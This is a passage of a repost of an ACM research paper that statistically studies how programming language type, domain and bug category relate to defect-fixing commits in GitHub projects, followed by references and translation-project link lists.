_id_  is a generic object pointer, which can be used with an object of any data type, regardless of the class.[b][13] The flexibility that such a generic data type provides can lead to implicit type conversion and also have unintended consequences.[c][14]Hence, we classify a language based on whether its compiler  _allows_  or  _disallows_  the implicit type conversion as above; the latter explicitly detects type confusion and reports it. - -Disallowing implicit type conversion could result from static type inference within a compiler (e.g., with `Java`), using a type-inference algorithm such as Hindley[10][15] and Milner,[17][16] or at run-time using a dynamic type checker. In contrast, a type-confusion can occur silently because it is either undetected or is unreported. Either way, implicitly allowing type conversion provides flexibility but may eventually cause errors that are difficult to localize. To abbreviate, we refer to languages allowing implicit type conversion as  _implicit_  and those that disallow it as  _explicit._ - - _Memory Class_  indicates whether the language requires developers to manage memory. We treat `Objective-C` as unmanaged, in spite of it following a hybrid model, because we observe many memory errors in its codebase, as discussed in RQ4 in Section 3. - -Note that we classify and study the languages as they are colloquially used by developers in real-world software. For example, `TypeScript` is intended to be used as a static language, which disallows implicit type conversion. However, in practice, we notice that developers often (for 50% of the variables, and across `TypeScript`-using projects in our dataset) use the `any` type, a catch-all union type, and thus, in practice, `TypeScript` allows dynamic, implicit type conversion. To minimize the confusion, we exclude `TypeScript` from our language classifications and the corresponding model (see [Table 3][55] and [7][56]). - -![*](http://dl.acm.org/images/bullet.gif) - **2.3\. Identifying project domain** - -We classify the studied projects into different domains based on their features and function using a mix of automated and manual techniques. The projects in GitHub come with `project descriptions` and README files that describe their features. We used Latent Dirichlet Allocation (LDA)[3][17] to analyze this text. Given a set of documents, LDA identifies a set of topics where each topic is represented as probability of generating different words. For each document, LDA also estimates the probability of assigning that document to each topic. - -We detect 30 distinct domains, that is, topics, and estimate the probability that each project belonging to each domain. Since these auto-detected domains include several project-specific keywords, for example, facebook, it is difficult to identify the underlying common functions. In order to assign a meaningful name to each domain, we manually inspect each of the 30 domains to identify projectname-independent, domain-identifying keywords. We manually rename all of the 30 auto-detected domains and find that the majority of the projects fall under six domains: Application, Database, CodeAnalyzer, Middleware, Library, and Framework. We also find that some projects do not fall under any of the above domains and so we assign them to a catchall domain labeled as  _Other_ . This classification of projects into domains was subsequently checked and confirmed by another member of our research group. [Table 4][57] summarizes the identified domains resulting from this process. - - [![t4.jpg](http://deliveryimages.acm.org/10.1145/3130000/3126905/t4.jpg)][58] -**Table 4\. Characteristics of domains.** - -![*](http://dl.acm.org/images/bullet.gif) - **2.4\. Categorizing bugs** - -While fixing software bugs, developers often leave important information in the commit logs about the nature of the bugs; for example, why the bugs arise and how to fix the bugs. We exploit such information to categorize the bugs, similar to Tan  _et al._ [13][18], [24][19] - -First, we categorize the bugs based on their  _Cause_  and  _Impact. Causes_  are further classified into disjoint subcategories of errors: Algorithmic, Concurrency, Memory, generic Programming, and Unknown. The bug  _Impact_  is also classified into four disjoint subcategories: Security, Performance, Failure, and Other unknown categories. Thus, each bug-fix commit also has an induced Cause and an Impact type. [Table 5][59] shows the description of each bug category. This classification is performed in two phases: - - [![t5.jpg](http://deliveryimages.acm.org/10.1145/3130000/3126905/t5.jpg)][60] -**Table 5\. Categories of bugs and their distribution in the whole dataset.** - -**(1) Keyword search.** We randomly choose 10% of the bug-fix messages and use a keyword based search technique to automatically categorize them as potential bug types. We use this annotation, separately, for both Cause and Impact types. We chose a restrictive set of keywords and phrases, as shown in [Table 5][61]. Such a restrictive set of keywords and phrases helps reduce false positives. - -**(2) Supervised classification.** We use the annotated bug fix logs from the previous step as training data for supervised learning techniques to classify the remainder of the bug fix messages by treating them as test data. We first convert each bug fix message to a bag-of- words. We then remove words that appear only once among all of the bug fix messages. This reduces project specific keywords. We also stem the bag-of- words using standard natural language processing techniques. Finally, we use Support Vector Machine to classify the test data. - -To evaluate the accuracy of the bug classifier, we manually annotated 180 randomly chosen bug fixes, equally distributed across all of the categories. We then compare the result of the automatic classifier with the manually annotated data set. The performance of this process was acceptable with precision ranging from a low of 70% for performance bugs to a high of 100% for concurrency bugs with an average of 84%. Recall ranged from 69% to 91% with an average of 84%. - -The result of our bug classification is shown in [Table 5][62]. Most of the defect causes are related to generic programming errors. This is not surprising as this category involves a wide variety of programming errors such as type errors, typos, compilation error, etc. Our technique could not classify 1.04% of the bug fix messages in any Cause or Impact category; we classify these as Unknown. - -![*](http://dl.acm.org/images/bullet.gif) - **2.5\. Statistical methods** - -We model the number of defective commits against other factors related to software projects using regression. All models use  _negative binomial regression_  (NBR) to model the counts of project attributes such as the number of commits. NBR is a type of generalized linear model used to model non-negative integer responses.[4][20] - -In our models we control for several language per-project dependent factors that are likely to influence the outcome. Consequently, each (language, project) pair is a row in our regression and is viewed as a sample from the population of open source projects. We log-transform dependent count variables as it stabilizes the variance and usually improves the model fit.[4][21] We verify this by comparing transformed with non transformed data using the AIC and Vuong's test for non-nested models. - -To check that excessive multicollinearity is not an issue, we compute the variance inflation factor of each dependent variable in all of the models with a conservative maximum value of 5.[4][22]We check for and remove high leverage points through visual examination of the residuals versus leverage plot for each model, looking for both separation and large values of Cook's distance. - -We employ  _effects_ , or  _contrast_ , coding in our study to facilitate interpretation of the language coefficients.[4][23] Weighted effects codes allow us to compare each language to the average effect across all languages while compensating for the unevenness of language usage across projects.[23][24]To test for the relationship between two factor variables we use a Chi-square test of independence.[14][25] After confirming a dependence we use Cramer's V, an  _r_  ×  _c_  equivalent of the phi coefficient for nominal data, to establish an effect size. - -[Back to Top][63] - -### 3\. Results - -We begin with a straightforward question that directly addresses the core of what some fervently believe must be true, namely: - -**RQ1\. Are some languages more defect-prone than others?** - -We use a regression model to compare the impact of each language on the number of defects with the average impact of all languages, against defect fixing commits (see [Table 6][64]). - - [![t6.jpg](http://deliveryimages.acm.org/10.1145/3130000/3126905/t6.jpg)][65] -**Table 6\. Some languages induce fewer defects than other languages.** - -We include some variables as controls for factors that will clearly influence the response. Project age is included as older projects will generally have a greater number of defect fixes. Trivially, the number of commits to a project will also impact the response. Additionally, the number of developers who touch a project and the raw size of the project are both expected to grow with project activity. - -The sign and magnitude of the estimated coefficients in the above model relates the predictors to the outcome. The first four variables are control variables and we are not interested in their impact on the outcome other than to say that they are all positive and significant. The language variables are indicator variables, viz. factor variables, for each project. The coefficient compares each language to the grand weighted mean of all languages in all projects. The language coefficients can be broadly grouped into three general categories. The first category is those for which the coefficient is statistically insignificant and the modeling procedure could not distinguish the coefficient from zero. These languages may behave similar to the average or they may have wide variance. The remaining coefficients are significant and either positive or negative. For those with positive coefficients we can expect that the language is associated with a greater number of defect fixes. These languages include `C, C++, Objective-C, Php`, and `Python`. The languages `Clojure, Haskell, Ruby`, and `Scala`, all have negative coefficients implying that these languages are less likely than average to result in defect fixing commits. - -One should take care not to overestimate the impact of language on defects. While the observed relationships are statistically significant, the effects are quite small. Analysis of deviance reveals that language accounts for less than 1% of the total explained deviance. - - [![ut1.jpg](http://deliveryimages.acm.org/10.1145/3130000/3126905/ut1.jpg)][66] - -We can read the model coefficients as the expected change in the log of the response for a one unit change in the predictor with all other predictors held constant; that is, for a coefficient  _βi_ , a one unit change in  _βi_  yields an expected change in the response of e _βi_ . For the factor variables, this expected change is compared to the average across all languages. Thus, if, for some number of commits, a particular project developed in an  _average_  language had four defective commits, then the choice to use C++ would mean that we should expect one additional defective commit since e0.18 × 4 = 4.79\. For the same project, choosing `Haskell` would mean that we should expect about one fewer defective commit as  _e_ −0.26 × 4 = 3.08\. The accuracy of this prediction depends on all other factors remaining the same, a challenging proposition for all but the most trivial of projects. All observational studies face similar limitations; we address this concern in more detail in Section 5. - -**Result 1:**  _Some languages have a greater association with defects than other languages, although the effect is small._ - -In the remainder of this paper we expand on this basic result by considering how different categories of application, defect, and language, lead to further insight into the relationship between languages and defect proneness. - -Software bugs usually fall under two broad categories: (1)  _Domain Specific bug_ : specific to project function and do not depend on the underlying programming language. (2)  _Generic bug_ : more generic in nature and has less to do with project function, for example, typeerrors, concurrency errors, etc. - -Consequently, it is reasonable to think that the interaction of application domain and language might impact the number of defects within a project. Since some languages are believed to excel at some tasks more so than others, for example, C for low level work, or `Java` for user applications, making an inappropriate choice might lead to a greater number of defects. To study this we should ideally ignore the domain specific bugs, as generic bugs are more likely to depend on the programming language featured. However, since a domain-specific bugs may also arise due to a generic programming error, it is difficult to separate the two. A possible workaround is to study languages while controlling the domain. Statistically, however, with 17 languages across 7 domains, the large number of terms would be challenging to interpret given the sample size. - -Given this, we first consider testing for the dependence between domain and language usage within a project, using a Chi-square test of independence. Of 119 cells, 46, that is, 39%, are below the value of 5 which is too high. No more than 20% of the counts should be below 5.[14][26] We include the value here for completeness[d][27]; however, the low strength of association of 0.191 as measured by Cramer's V, suggests that any relationship between domain and language is small and that inclusion of domain in regression models would not produce meaningful results. - -One option to address this concern would be to remove languages or combine domains, however, our data here presents no clear choices. Alternatively, we could combine languages; this choice leads to a related but slightly different question. - -**RQ2\. Which language properties relate to defects?** - -Rather than considering languages individually, we aggregate them by language class, as described in Section 2.2, and analyze the relationship to defects. Broadly, each of these properties divides languages along lines that are often discussed in the context of errors, drives user debate, or has been the subject of prior work. Since the individual properties are highly correlated, we create six model factors that combine all of the individual factors across all of the languages in our study. We then model the impact of the six different factors on the number of defects while controlling for the same basic covariates that we used in the model in  _RQ1_ . - -As with language (earlier in [Table 6][67]), we are comparing language  _classes_  with the average behavior across all language classes. The model is presented in [Table 7][68]. It is clear that `Script-Dynamic-Explicit-Managed` class has the smallest magnitude coefficient. The coefficient is insignificant, that is, the z-test for the coefficient cannot distinguish the coefficient from zero. Given the magnitude of the standard error, however, we can assume that the behavior of languages in this class is very close to the average across all languages. We confirm this by recoding the coefficient using `Proc-Static-Implicit-Unmanaged` as the base level and employing treatment, or dummy coding that compares each language class with the base level. In this case, `Script-Dynamic-Explicit-Managed` is significantly different with  _p_  = 0.00044\. We note here that while choosing different coding methods affects the coefficients and z-scores, the models are identical in all other respects. When we change the coding we are rescaling the coefficients to reflect the comparison that we wish to make.[4][28] Comparing the other language classes to the grand mean, `Proc-Static-Implicit-Unmanaged` languages are more likely to induce defects. This implies that either implicit type conversion or memory management issues contribute to greater defect proneness as compared with other procedural languages. - - [![t7.jpg](http://deliveryimages.acm.org/10.1145/3130000/3126905/t7.jpg)][69] -**Table 7\. Functional languages have a smaller relationship to defects than other language classes whereas procedural languages are greater than or similar to the average.** - -Among scripting languages we observe a similar relationship between languages that allow versus those that do not allow implicit type conversion, providing some evidence that implicit type conversion (vs. explicit) is responsible for this difference as opposed to memory management. We cannot state this conclusively given the correlation between factors. However when compared to the average, as a group, languages that do not allow implicit type conversion are less error-prone while those that do are more error-prone. The contrast between static and dynamic typing is also visible in functional languages. - -The functional languages as a group show a strong difference from the average. Statically typed languages have a substantially smaller coefficient yet both functional language classes have the same standard error. This is strong evidence that functional static languages are less error-prone than functional dynamic languages, however, the z-tests only test whether the coefficients are different from zero. In order to strengthen this assertion, we recode the model as above using treatment coding and observe that the `Functional-Static-Explicit-Managed` language class is significantly less defect-prone than the `Functional-Dynamic-Explicit-Managed`language class with  _p_  = 0.034. - - [![ut2.jpg](http://deliveryimages.acm.org/10.1145/3130000/3126905/ut2.jpg)][70] - -As with language and defects, the relationship between language class and defects is based on a small effect. The deviance explained is similar, albeit smaller, with language class explaining much less than 1% of the deviance. - -We now revisit the question of application domain. Does domain have an interaction with language class? Does the choice of, for example, a functional language, have an advantage for a particular domain? As above, a Chi-square test for the relationship between these factors and the project domain yields a value of 99.05 and  _df_  = 30 with  _p_  = 2.622e–09 allowing us to reject the null hypothesis that the factors are independent. Cramer's-V yields a value of 0.133, a weak level of association. Consequently, although there is some relation between domain and language, there is only a weak relationship between domain and language class. - -**Result 2:**  _There is a small but significant relationship between language class and defects. Functional languages are associated with fewer defects than either procedural or scripting languages._ - -It is somewhat unsatisfying that we do not observe a strong association between language, or language class, and domain within a project. An alternative way to view this same data is to disregard projects and aggregate defects over all languages and domains. Since this does not yield independent samples, we do not attempt to analyze it statistically, rather we take a descriptive, visualization-based approach. - -We define  _Defect Proneness_  as the ratio of bug fix commits over total commits per language per domain. [Figure 1][71] illustrates the interaction between domain and language using a heat map, where the defect proneness increases from lighter to darker zone. We investigate which language factors influence defect fixing commits across a collection of projects written across a variety of languages. This leads to the following research question: - - [![f1.jpg](http://deliveryimages.acm.org/10.1145/3130000/3126905/f1.jpg)][72] -**Figure 1\. Interaction of language's defect proneness with domain. Each cell in the heat map represents defect proneness of a language (row header) for a given domain (column header). The "Overall" column represents defect proneness of a language over all the domains. The cells with white cross mark indicate null value, that is, no commits were made corresponding to that cell.** - -**RQ3\. Does language defect proneness depend on domain?** - -In order to answer this question we first filtered out projects that would have been viewed as outliers, filtered as high leverage points, in our regression models. This was necessary here as, even though this is a nonstatistical method, some relationships could impact visualization. For example, we found that a single project, Google's v8, a `JavaScript` project, was responsible for all of the errors in Middleware. This was surprising to us since `JavaScript` is typically not used for Middleware. This pattern repeats in other domains, consequently, we filter out the projects that have defect density below 10 and above 90 percentile. The result is in [Figure 1][73]. - -We see only a subdued variation in this heat map which is a result of the inherent defect proneness of the languages as seen in RQ1\. To validate this, we measure the pairwise rank correlation between the language defect proneness for each domain with the overall. For all of the domains except Database, the correlation is positive, and p-values are significant (<0.01). Thus, w.r.t. defect proneness, the language ordering in each domain is strongly correlated with the overall language ordering. - - [![ut3.jpg](http://deliveryimages.acm.org/10.1145/3130000/3126905/ut3.jpg)][74] - -**Result 3:**  _There is no general relationship between application domain and language defect proneness._ - -We have shown that different languages induce a larger number of defects and that this relationship is not only related to particular languages but holds for general classes of languages; however, we find that the type of project does not mediate this relationship to a large degree. We now turn our attention to categorization of the response. We want to understand how language relates to specific kinds of defects and how this relationship compares to the more general relationship that we observe. We divide the defects into categories as described in [Table 5][75] and ask the following question: - -**RQ4\. What is the relation between language and bug category?** - -We use an approach similar to RQ3 to understand the relation between languages and bug categories. First, we study the relation between bug categories and language class. A heat map ([Figure 2][76]) shows aggregated defects over language classes and bug types. To understand the interaction between bug categories and languages, we use an NBR regression model for each category. For each model we use the same control factors as RQ1 as well as languages encoded with weighted effects to predict defect fixing commits. - - [![f2.jpg](http://deliveryimages.acm.org/10.1145/3130000/3126905/f2.jpg)][77] -**Figure 2\. Relation between bug categories and language class. Each cell represents percentage of bug fix commit out of all bug fix commits per language class (row header) per bug category (column header). The values are normalized column wise.** - -The results along with the anova value for language are shown in [Table 8][78]. The overall deviance for each model is substantially smaller and the proportion explained by language for a specific defect type is similar in magnitude for most of the categories. We interpret this relationship to mean that language has a greater impact on specific categories of bugs, than it does on bugs overall. In the next section we expand on these results for the bug categories with significant bug counts as reported in [Table 5][79]. However, our conclusion generalizes for all categories. - - [![t8.jpg](http://deliveryimages.acm.org/10.1145/3130000/3126905/t8.jpg)][80] -**Table 8\. While the impact of language on defects varies across defect category, language has a greater impact on specific categories than it does on defects in general.** - -**Programming errors.** Generic programming errors account for around 88.53% of all bug fix commits and occur in all the language classes. Consequently, the regression analysis draws a similar conclusion as of RQ1 (see [Table 6][81]). All languages incur programming errors such as faulty error-handling, faulty definitions, typos, etc. - -**Memory errors.** Memory errors account for 5.44% of all the bug fix commits. The heat map in [Figure 2][82] shows a strong relationship between `Proc-Static-Implicit-Unmanaged` class and memory errors. This is expected as languages with unmanaged memory are known for memory bugs. [Table 8][83]confirms that such languages, for example, C, C++, and `Objective-C` introduce more memory errors. Among the managed languages, `Java` induces more memory errors, although fewer than the unmanaged languages. Although `Java` has its own garbage collector, memory leaks are not surprising since unused object references often prevent the garbage collector from reclaiming memory.[11][29] In our data, 28.89% of all the memory errors in `Java` are the result of a memory leak. In terms of effect size, language has a larger impact on memory defects than all other  _cause_ categories. - -**Concurrency errors.** 1.99% of the total bug fix commits are related to concurrency errors. The heat map shows that `Proc-Static-Implicit-Unmanaged` dominates this error type. C and C++ introduce 19.15% and 7.89% of the errors, and they are distributed across the projects. - - [![ut4.jpg](http://deliveryimages.acm.org/10.1145/3130000/3126905/ut4.jpg)][84] - -Both of the `Static-Strong-Managed` language classes are in the darker zone in the heat map confirming, in general static languages produce more concurrency errors than others. Among the dynamic languages, only `Erlang` is more prone to concurrency errors, perhaps relating to the greater use of this language for concurrent applications. Likewise, the negative coefficients in [Table 8][85] shows that projects written in dynamic languages like `Ruby` and `Php` have fewer concurrency errors. Note that, certain languages like `JavaScript, CoffeeScript`, and `TypeScript` do not support concurrency, in its traditional form, while `Php` has a limited support depending on its implementations. These languages introduce artificial zeros in the data, and thus the concurrency model coefficients in [Table 8][86] for those languages cannot be interpreted like the other coefficients. Due to these artificial zeros, the average over all languages in this model is smaller, which may affect the sizes of the coefficients, since they are given w.r.t. the average, but it will not affect their relative relationships, which is what we are after. - -A textual analysis based on word-frequency of the bug fix messages suggests that most of the concurrency errors occur due to a race condition, deadlock, or incorrect synchronization, as shown in the table above. Across all language, race conditions are the most frequent cause of such errors, for example, 92% in `Go`. The enrichment of race condition errors in `Go` is probably due to an accompanying race-detection tool that may help developers locate races. The synchronization errors are primarily related to message passing interface (MPI) or shared memory operation (SHM). `Erlang` and `Go` use MPI[e][30] for inter-thread communication, which explains why these two languages do not have any SHM related errors such as locking, mutex, etc. In contrast, projects in the other languages use SHM primitives for communication and can thus may have locking-related errors. - -**Security and other impact errors.** Around 7.33% of all the bug fix commits are related to Impact errors. Among them `Erlang, C++`, and `Python` associate with more security errors than average ([Table 8][87]). `Clojure` projects associate with fewer security errors ([Figure 2][88]). From the heat map we also see that `Static` languages are in general more prone to failure and performance errors, these are followed by `Functional-Dynamic-Explicit-Managed` languages such as `Erlang`. The analysis of deviance results confirm that language is strongly associated with failure impacts. While security errors are the weakest among the categories, the deviance explained by language is still quite strong when compared with the residual deviance. - -**Result 4:**  _Defect types are strongly associated with languages; some defect type like memory errors and concurrency errors also depend on language primitives. Language matters more for specific categories than it does for defects overall._ - -[Back to Top][89] - -### 4\. Related Work - -Prior work on programming language comparison falls in three categories: - -**(1)  _Controlled experiment._**  For a given task, developers are monitored while programming in different languages. Researchers then compare outcomes such as development effort and program quality. Hanenberg[7][31] compared static versus dynamic typing by monitoring 48 programmers for 27 h while developing a parser program. He found no significant difference in code quality between the two; however, dynamic type-based languages were found to have shorter development time. Their study was conducted with undergraduate students in a lab setting with custom-designed language and IDE. Our study, by contrast is a field study of popular software applications. While we can only indirectly (and  _post facto_ ) control for confounding factors using regression, we benefit from much larger sample sizes, and more realistic, widely-used software. We find that statically typed languages in general are less defect-prone than the dynamic types, and that disallowing implicit type conversion is better than allowing it, in the same regard. The effect sizes are modest; it could be reasonably argued that they are visible here precisely because of the large sample sizes. - -Harrison et al.[8][32] compared C++, a procedural language, with `SML`, a functional language, finding no significant difference in total number of errors, although `SML` has higher defect density than C++. `SML` was not represented in our data, which however, suggest that functional languages are generally less defect-prone than procedural languages. Another line of work primarily focuses on comparing development effort across different languages.[12][33], [20][34] However, they do not analyze language defect proneness. - -**(2)  _Surveys._**  Meyerovich and Rabkin[16][35] survey developers' views of programming languages, to study why some languages are more popular than others. They report strong influence from non-linguistic factors: prior language skills, availability of open source tools, and existing legacy systems. Our study also confirms that the availability of external tools also impacts software quality; for example, concurrency bugs in `Go` (see RQ4 in Section 3). - -**(3)  _Repository mining._**  Bhattacharya and Neamtiu[1][36] study four projects developed in both C and C++ and find that the software components developed in C++ are in general more reliable than C. We find that both C and C++ are more defect-prone than average. However, for certain bug types like concurrency errors, C is more defect-prone than C++ (see RQ4 in Section 3). - -[Back to Top][90] - -### 5\. Threats to Validity - -We recognize few threats to our reported results. First, to identify bug fix commits we rely on the keywords that developers often use to indicate a bug fix. Our choice was deliberate. We wanted to capture the issues that developers continuously face in an ongoing development process, rather than reported bugs. However, this choice possesses threats of over estimation. Our categorization of domains is subject to interpreter bias, although another member of our group verified the categories. Also, our effort to categorize bug fix commits could potentially be tainted by the initial choice of keywords. The descriptiveness of commit logs vary across projects. To mitigate these threats, we evaluate our classification against manual annotation as discussed in Section 2.4. - -We determine the language of a file based on its extension. This can be error-prone if a file written in a different language takes a common language extension that we have studied. To reduce such error, we manually verified language categorization against a randomly sampled file set. - -To interpret language class in Section 2.2, we make certain assumptions based on how a language property is most commonly used, as reflected in our data set, for example, we classify `Objective-C` as unmanaged memory type rather than hybrid. Similarly, we annotate `Scala` as functional and C# as procedural, although both support either design choice.[19][37], [21][38] We do not distinguish object-oriented languages (OOP) from procedural languages in this work as there is no clear distinction, the difference largely depends on programming style. We categorize C++ as allowing implicit type conversion because a memory region of a certain type can be treated differently using pointer manipulation.[22][39] We note that most C++ compilers can detect type errors at compile time. - -Finally, we associate defect fixing commits to language properties, although they could reflect reporting style or other developer properties. Availability of external tools or libraries may also impact the extent of bugs associated with a language. - -[Back to Top][91] - -### 6\. Conclusion - -We have presented a large-scale study of language type and use as it relates to software quality. The Github data we used is characterized by its complexity and variance along multiple dimensions. Our sample size allows a mixed-methods study of the effects of language, and of the interactions of language, domain, and defect type while controlling for a number of confounds. The data indicates that functional languages are better than procedural languages; it suggests that disallowing implicit type conversion is better than allowing it; that static typing is better than dynamic; and that managed memory usage is better than unmanaged. Further, that the defect proneness of languages in general is not associated with software domains. Additionally, languages are more related to individual bug categories than bugs overall. - -On the other hand, even large datasets become small and insufficient when they are sliced and diced many ways simultaneously. Consequently, with an increasing number of dependent variables it is difficult to answer questions about a specific variable's effect, especially where variable interactions exist. Hence, we are unable to quantify the specific effects of language type on usage. Additional methods such as surveys could be helpful here. Addressing these challenges remains for future work. - -[Back to Top][92] - -### Acknowledgments - -This material is based upon work supported by the National Science Foundation under grant nos. 1445079, 1247280, 1414172, 1446683 and from AFOSR award FA955-11-1-0246. - -[Back to Top][93] - -### References - -1\. Bhattacharya, P., Neamtiu, I. Assessing programming language impact on development and maintenance: A study on C and C++. In  _Proceedings of the 33rd International Conference on Software Engineering, ICSE'11_  (New York, NY USA, 2011). ACM, 171–180. - -2\. Bird, C., Nagappan, N., Murphy, B., Gall, H., Devanbu, P. Don't touch my code! Examining the effects of ownership on software quality. In  _Proceedings of the 19th ACM SIGSOFT Symposium and the 13th European Conference on Foundations of Software Engineering_  (2011). ACM, 4–14. - -3\. Blei, D.M. Probabilistic topic models.  _Commun. ACM 55_ , 4 (2012), 77–84. - -4\. Cohen, J.  _Applied Multiple Regression/Correlation Analysis for the Behavioral Sciences._ Lawrence Erlbaum, 2003. - -5\. Easterbrook, S., Singer, J., Storey, M.-A., Damian, D. Selecting empirical methods for software engineering research. In  _Guide to Advanced Empirical Software Engineering_  (2008). Springer, 285–311. - -6\. El Emam, K., Benlarbi, S., Goel, N., Rai, S.N. The confounding effect of class size on the validity of object-oriented metrics.  _IEEE Trans. Softw. Eng. 27_ , 7 (2001), 630–650. - -7\. Hanenberg, S. An experiment about static and dynamic type systems: Doubts about the positive impact of static type systems on development time. In  _Proceedings of the ACM International Conference on Object Oriented Programming Systems Languages and Applications, OOPSLA'10_  (New York, NY, USA, 2010). ACM, 22–35. - -8\. Harrison, R., Smaraweera, L., Dobie, M., Lewis, P. Comparing programming paradigms: An evaluation of functional and object-oriented programs.  _Softw. Eng. J. 11_ , 4 (1996), 247–254. - -9\. Harter, D.E., Krishnan, M.S., Slaughter, S.A. Effects of process maturity on quality, cycle time, and effort in software product development.  _Manage. Sci. 46_  4 (2000), 451–466. - -10\. Hindley, R. The principal type-scheme of an object in combinatory logic.  _Trans. Am. Math. Soc._  (1969), 29–60. - -11\. Jump, M., McKinley, K.S. Cork: Dynamic memory leak detection for garbage-collected languages. In  _ACM SIGPLAN Notices_ , Volume 42 (2007). ACM, 31–38. - -12\. Kleinschmager, S., Hanenberg, S., Robbes, R., Tanter, É., Stefik, A. Do static type systems improve the maintainability of software systems? An empirical study. In  _2012 IEEE 20th International Conference on Program Comprehension (ICPC)_  (2012). IEEE, 153–162. - -13\. Li, Z., Tan, L., Wang, X., Lu, S., Zhou, Y., Zhai, C. Have things changed now? An empirical study of bug characteristics in modern open source software. In  _ASID'06: Proceedings of the 1st Workshop on Architectural and System Support for Improving Software Dependability_  (October 2006). - -14\. Marques De Sá, J.P.  _Applied Statistics Using SPSS, Statistica and Matlab_ , 2003. - -15\. Mayer, C., Hanenberg, S., Robbes, R., Tanter, É., Stefik, A. An empirical study of the influence of static type systems on the usability of undocumented software. In  _ACM SIGPLAN Notices_ , Volume 47 (2012). ACM, 683–702. - -16\. Meyerovich, L.A., Rabkin, A.S. Empirical analysis of programming language adoption. In  _Proceedings of the 2013 ACM SIGPLAN International Conference on Object Oriented Programming Systems Languages & Applications_  (2013). ACM, 1–18. - -17\. Milner, R. A theory of type polymorphism in programming.  _J. Comput. Syst. Sci. 17_ , 3 (1978), 348–375. - -18\. Mockus, A., Votta, L.G. Identifying reasons for software changes using historic databases. In  _ICSM'00\. Proceedings of the International Conference on Software Maintenance_  (2000). IEEE Computer Society, 120. - -19\. Odersky, M., Spoon, L., Venners, B.  _Programming in Scala._  Artima Inc, 2008. - -20\. Pankratius, V., Schmidt, F., Garretón, G. Combining functional and imperative programming for multicore software: An empirical study evaluating scala and java. In  _Proceedings of the 2012 International Conference on Software Engineering_  (2012). IEEE Press, 123–133. - -21\. Petricek, T., Skeet, J.  _Real World Functional Programming: With Examples in F# and C#._ Manning Publications Co., 2009. - -22\. Pierce, B.C.  _Types and Programming Languages._  MIT Press, 2002. - -23\. Posnett, D., Bird, C., Dévanbu, P. An empirical study on the influence of pattern roles on change-proneness.  _Emp. Softw. Eng. 16_ , 3 (2011), 396–423. - -24\. Tan, L., Liu, C., Li, Z., Wang, X., Zhou, Y., Zhai, C. Bug characteristics in open source software.  _Emp. Softw. Eng._  (2013). - --------------------------------------------------------------------------------- - -via: https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007 - -作者:[ Baishakhi Ray][a], [Daryl Posnett][b], [Premkumar Devanbu][c], [Vladimir Filkov ][d] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:http://delivery.acm.org/10.1145/3130000/3126905/mailto:rayb@virginia.edu -[b]:http://delivery.acm.org/10.1145/3130000/3126905/mailto:dpposnett@ucdavis.edu -[c]:http://delivery.acm.org/10.1145/3130000/3126905/mailto:devanbu@cs.ucdavis.edu -[d]:http://delivery.acm.org/10.1145/3130000/3126905/mailto:filkov@cs.ucdavis.edu -[1]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R6 -[2]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R2 -[3]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R9 -[4]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R7 -[5]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R12 -[6]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R15 -[7]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R5 -[8]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R18 -[9]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R7 -[10]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R8 -[11]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R12 -[12]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#FNA -[13]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#FNB -[14]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#FNC -[15]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R10 -[16]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R17 -[17]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R3 